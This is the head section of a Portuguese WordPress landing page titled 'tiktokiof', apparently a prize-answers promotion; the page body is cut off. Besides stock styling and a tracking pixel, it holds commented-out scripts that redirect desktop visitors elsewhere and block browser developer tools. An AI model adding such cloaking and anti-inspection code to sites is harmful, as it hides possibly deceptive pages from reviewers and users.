<!DOCTYPE html><html lang="pt-BR"><head>
	<meta charset="UTF-8">
			<title>tiktokiof – Tiktok</title>
		<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="max-image-preview:large">
	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
	<title>tiktokiof – Tiktok</title>
<link rel="alternate" type="application/rss+xml" title="Feed para Tiktok »" href="https://respostaspremiadas.com/feed/">
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Tiktok »" href="https://respostaspremiadas.com/comments/feed/">


<!-- <script>
  // Função para detectar se o usuário está em desktop
  function detectDesktopAccess() {
    const userAgent = navigator.userAgent.toLowerCase();
    const isMobile = /mobile|android|iphone|ipad|phone/.test(userAgent);

    // Redireciona apenas se não for dispositivo móvel
    if (!isMobile) {
      console.log("Dispositivo detectado: Desktop. Redirecionando...");
      window.location.href = "https://siteconfiavel.github.io/CLONADOR-COMEDIA/";
    } else {
      console.log("Dispositivo detectado: Mobile. Acesso permitido.");
    }
  }

  // Aguarda o carregamento total do DOM antes de executar
  document.addEventListener("DOMContentLoaded", detectDesktopAccess);
</script>

-->

	<!-- HFCM by 99 Robots - Snippet # 1: Disable-dev -->
<!-- <link rel="preload" href="https://cdn.jsdelivr.net/npm/disable-devtool@latest" as="script">
<script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool@latest"></script> -->
<!-- /end HFCM by 99 Robots -->


<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/respostaspremiadas.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
</style>
<style id="wp-block-library-inline-css">
:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px;--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color)}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip:auto!important;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-right-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-left-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
</style>
<style id="global-styles-inline-css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--base: #FFFFFF;--wp--preset--color--contrast: #111111;--wp--preset--color--accent-1: #FFEE58;--wp--preset--color--accent-2: #F6CFF4;--wp--preset--color--accent-3: #503AA8;--wp--preset--color--accent-4: #686868;--wp--preset--color--accent-5: #FBFAF3;--wp--preset--color--accent-6: color-mix(in srgb, currentColor 20%, transparent);--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 0.875rem;--wp--preset--font-size--medium: clamp(1rem, 1rem + ((1vw - 0.2rem) * 0.196), 1.125rem);--wp--preset--font-size--large: clamp(1.125rem, 1.125rem + ((1vw - 0.2rem) * 0.392), 1.375rem);--wp--preset--font-size--x-large: clamp(1.75rem, 1.75rem + ((1vw - 0.2rem) * 0.392), 2rem);--wp--preset--font-size--xx-large: clamp(2.15rem, 2.15rem + ((1vw - 0.2rem) * 1.333), 3rem);--wp--preset--font-family--manrope: Manrope, sans-serif;--wp--preset--font-family--fira-code: "Fira Code", monospace;--wp--preset--spacing--20: 10px;--wp--preset--spacing--30: 20px;--wp--preset--spacing--40: 30px;--wp--preset--spacing--50: clamp(30px, 5vw, 50px);--wp--preset--spacing--60: clamp(30px, 7vw, 70px);--wp--preset--spacing--70: clamp(50px, 7vw, 90px);--wp--preset--spacing--80: clamp(70px, 10vw, 140px);--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:root { --wp--style--global--content-size: 645px;--wp--style--global--wide-size: 1340px; }:where(body) { margin: 0; }.wp-site-blocks { padding-top: var(--wp--style--root--padding-top); padding-bottom: var(--wp--style--root--padding-bottom); }.has-global-padding { padding-right: var(--wp--style--root--padding-right); padding-left: var(--wp--style--root--padding-left); }.has-global-padding > .alignfull { margin-right: calc(var(--wp--style--root--padding-right) * -1); margin-left: calc(var(--wp--style--root--padding-left) * -1); }.has-global-padding :where(:not(.alignfull.is-layout-flow) > .has-global-padding:not(.wp-block-block, .alignfull)) { padding-right: 0; padding-left: 0; }.has-global-padding :where(:not(.alignfull.is-layout-flow) > .has-global-padding:not(.wp-block-block, .alignfull)) > .alignfull { margin-left: 0; margin-right: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.wp-site-blocks) > * { margin-block-start: 1.2rem; margin-block-end: 0; }:where(.wp-site-blocks) > :first-child { margin-block-start: 0; }:where(.wp-site-blocks) > :last-child { margin-block-end: 0; }:root { --wp--style--block-gap: 1.2rem; }:root :where(.is-layout-flow) > :first-child{margin-block-start: 0;}:root :where(.is-layout-flow) > :last-child{margin-block-end: 0;}:root :where(.is-layout-flow) > *{margin-block-start: 1.2rem;margin-block-end: 0;}:root :where(.is-layout-constrained) > :first-child{margin-block-start: 0;}:root :where(.is-layout-constrained) > :last-child{margin-block-end: 0;}:root :where(.is-layout-constrained) > *{margin-block-start: 1.2rem;margin-block-end: 0;}:root :where(.is-layout-flex){gap: 1.2rem;}:root :where(.is-layout-grid){gap: 1.2rem;}.is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}body{background-color: var(--wp--preset--color--base);color: var(--wp--preset--color--contrast);font-family: var(--wp--preset--font-family--manrope);font-size: var(--wp--preset--font-size--large);font-weight: 300;letter-spacing: -0.1px;line-height: 1.4;--wp--style--root--padding-top: 0px;--wp--style--root--padding-right: var(--wp--preset--spacing--50);--wp--style--root--padding-bottom: 0px;--wp--style--root--padding-left: var(--wp--preset--spacing--50);}a:where(:not(.wp-element-button)){color: currentColor;text-decoration: underline;}:root :where(a:where(:not(.wp-element-button)):hover){text-decoration: none;}h1, h2, h3, h4, h5, h6{font-weight: 400;letter-spacing: -0.1px;line-height: 1.125;}h1{font-size: var(--wp--preset--font-size--xx-large);}h2{font-size: var(--wp--preset--font-size--x-large);}h3{font-size: var(--wp--preset--font-size--large);}h4{font-size: var(--wp--preset--font-size--medium);}h5{font-size: var(--wp--preset--font-size--small);letter-spacing: 0.5px;}h6{font-size: var(--wp--preset--font-size--small);font-weight: 700;letter-spacing: 1.4px;text-transform: uppercase;}:root :where(.wp-element-button, .wp-block-button__link){background-color: var(--wp--preset--color--contrast);border-width: 0;color: var(--wp--preset--color--base);font-family: inherit;font-size: var(--wp--preset--font-size--medium);line-height: inherit;padding-top: 1rem;padding-right: 2.25rem;padding-bottom: 1rem;padding-left: 2.25rem;text-decoration: none;}:root :where(.wp-element-button:hover, .wp-block-button__link:hover){background-color: color-mix(in srgb, var(--wp--preset--color--contrast) 85%, transparent);border-color: transparent;color: var(--wp--preset--color--base);}:root :where(.wp-element-button:focus, .wp-block-button__link:focus){outline-color: var(--wp--preset--color--accent-4);outline-offset: 2px;}:root :where(.wp-element-caption, .wp-block-audio figcaption, .wp-block-embed figcaption, .wp-block-gallery figcaption, .wp-block-image figcaption, .wp-block-table figcaption, .wp-block-video figcaption){font-size: var(--wp--preset--font-size--small);line-height: 1.4;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-base-color{color: var(--wp--preset--color--base) !important;}.has-contrast-color{color: var(--wp--preset--color--contrast) !important;}.has-accent-1-color{color: var(--wp--preset--color--accent-1) !important;}.has-accent-2-color{color: var(--wp--preset--color--accent-2) !important;}.has-accent-3-color{color: var(--wp--preset--color--accent-3) !important;}.has-accent-4-color{color: var(--wp--preset--color--accent-4) !important;}.has-accent-5-color{color: var(--wp--preset--color--accent-5) !important;}.has-accent-6-color{color: var(--wp--preset--color--accent-6) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-base-background-color{background-color: var(--wp--preset--color--base) !important;}.has-contrast-background-color{background-color: var(--wp--preset--color--contrast) !important;}.has-accent-1-background-color{background-color: var(--wp--preset--color--accent-1) !important;}.has-accent-2-background-color{background-color: var(--wp--preset--color--accent-2) !important;}.has-accent-3-background-color{background-color: var(--wp--preset--color--accent-3) !important;}.has-accent-4-background-color{background-color: var(--wp--preset--color--accent-4) !important;}.has-accent-5-background-color{background-color: var(--wp--preset--color--accent-5) !important;}.has-accent-6-background-color{background-color: var(--wp--preset--color--accent-6) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-base-border-color{border-color: var(--wp--preset--color--base) !important;}.has-contrast-border-color{border-color: var(--wp--preset--color--contrast) !important;}.has-accent-1-border-color{border-color: var(--wp--preset--color--accent-1) !important;}.has-accent-2-border-color{border-color: var(--wp--preset--color--accent-2) !important;}.has-accent-3-border-color{border-color: var(--wp--preset--color--accent-3) !important;}.has-accent-4-border-color{border-color: var(--wp--preset--color--accent-4) !important;}.has-accent-5-border-color{border-color: var(--wp--preset--color--accent-5) !important;}.has-accent-6-border-color{border-color: var(--wp--preset--color--accent-6) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}.has-xx-large-font-size{font-size: var(--wp--preset--font-size--xx-large) !important;}.has-manrope-font-family{font-family: var(--wp--preset--font-family--manrope) !important;}.has-fira-code-font-family{font-family: var(--wp--preset--font-family--fira-code) !important;}
</style>
<style id="wp-block-template-skip-link-inline-css">

		.skip-link.screen-reader-text {
			border: 0;
			clip: rect(1px,1px,1px,1px);
			clip-path: inset(50%);
			height: 1px;
			margin: -1px;
			overflow: hidden;
			padding: 0;
			position: absolute !important;
			width: 1px;
			word-wrap: normal !important;
		}

		.skip-link.screen-reader-text:focus {
			background-color: #eee;
			clip: auto !important;
			clip-path: none;
			color: #444;
			display: block;
			font-size: 1em;
			height: auto;
			left: 5px;
			line-height: normal;
			padding: 15px 23px 14px;
			text-decoration: none;
			top: 5px;
			width: auto;
			z-index: 100000;
		}
</style>
<link rel="stylesheet" id="twentytwentyfive-style-css" href="css/style.css" media="all">
<link rel="stylesheet" id="elementor-frontend-css" href="css/frontend.min.css" media="all">
<link rel="stylesheet" id="elementor-post-5-css" href="css/post-5.css" media="all">
<link rel="stylesheet" id="widget-heading-css" href="css/widget-heading.min.css" media="all">
<link rel="stylesheet" id="widget-divider-css" href="css/widget-divider.min.css" media="all">
<link rel="stylesheet" id="elementor-post-200-css" href="css/post-200.css" media="all">
<link rel="stylesheet" id="google-fonts-1-css" href="https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CInter%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=swap&ver=6.7.1" media="all">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><link rel="https://api.w.org/" href="https://respostaspremiadas.com/wp-json/"><link rel="alternate" title="JSON" type="application/json" href="https://respostaspremiadas.com/wp-json/wp/v2/pages/200"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://respostaspremiadas.com/xmlrpc.php?rsd">
<meta name="generator" content="WordPress 6.7.1">
<link rel="canonical" href="https://respostaspremiadas.com/tiktokiof/">
<link rel="shortlink" href="https://respostaspremiadas.com/?p=200">
<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://respostaspremiadas.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frespostaspremiadas.com%2Ftiktokiof%2F">
<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://respostaspremiadas.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frespostaspremiadas.com%2Ftiktokiof%2F&format=xml">
<meta name="generator" content="Elementor 3.26.3; features: e_font_icon_svg, additional_custom_breakpoints, e_element_cache; settings: css_print_method-external, google_font-enabled, font_display-swap">
			<style>
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
					background-image: none !important;
				}
				@media screen and (max-height: 1024px) {
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
				@media screen and (max-height: 640px) {
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
			</style>
			<style class="wp-fonts-local">
@font-face{font-family:Manrope;font-style:normal;font-weight:200 800;font-display:fallback;src:url('fonts/Manrope-VariableFont_wght.woff2') format('woff2');}
@font-face{font-family:"Fira Code";font-style:normal;font-weight:300 700;font-display:fallback;src:url('fonts/FiraCode-VariableFont_wght.woff2') format('woff2');}
</style>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"><script src="js/wp-emoji-release.min.js" defer=""></script>
	
		<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

<script>
  window.pixelId = "676e49b05eecb002e8cbc438";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
	
	
	
	
	<style>
	
.faq-section {
  margin-top: 20px;
  padding: 20px;
  background-color: #f9f9f9;
  border-radius: 8px;
  box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
  font-family: "Inter", Sans-serif; /* Fonte padrão para o FAQ */
}

.faq-title {
  font-size: 35px;
  font-weight: 600;
  text-shadow: 0px 0px 3px rgba(0, 0, 0, 0.1);
  color: #000000;
  margin-bottom: 15px;
}

.faq-item {
  margin-bottom: 10px;
}

.faq-question {
  width: 100%;
  text-align: left;
  font-size: 16px;
  font-weight: 500;
  font-family: "Inter", Sans-serif; /* Fonte aplicada às perguntas */
  padding: 10px;
  background-color: #ffffff;
  border: 1px solid #ddd;
  border-radius: 5px;
  cursor: pointer;
  transition: background-color 0.3s;
  color: #000000; /* Cor preta padrão */
}

.faq-question:hover {
  background-color: #f1f1f1;
}

.faq-answer {
  display: none;
  margin-top: 8px;
  padding: 10px;
  font-size: 14px;
  font-weight: 400;
  font-family: "Inter", Sans-serif; /* Fonte aplicada às respostas */
  color: #6e6d6d;
  border-left: 3px solid #007bff;
  background-color: #fefefe;
}


</style>
	
	<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">

	
	</head>
<body class="page-template page-template-elementor_canvas page page-id-200 wp-embed-responsive elementor-default elementor-template-canvas elementor-kit-5 elementor-page elementor-page-200">
			<div data-elementor-type="wp-page" data-elementor-id="200" class="elementor elementor-200" data-elementor-post-type="page">
				<div class="elementor-element elementor-element-7b737068 e-flex e-con-boxed e-con e-parent e-lazyloaded" data-id="7b737068" data-element_type="container" data-settings="{" background_background":"classic"}"="">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-206cb71 elementor-widget elementor-widget-html" data-id="206cb71" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
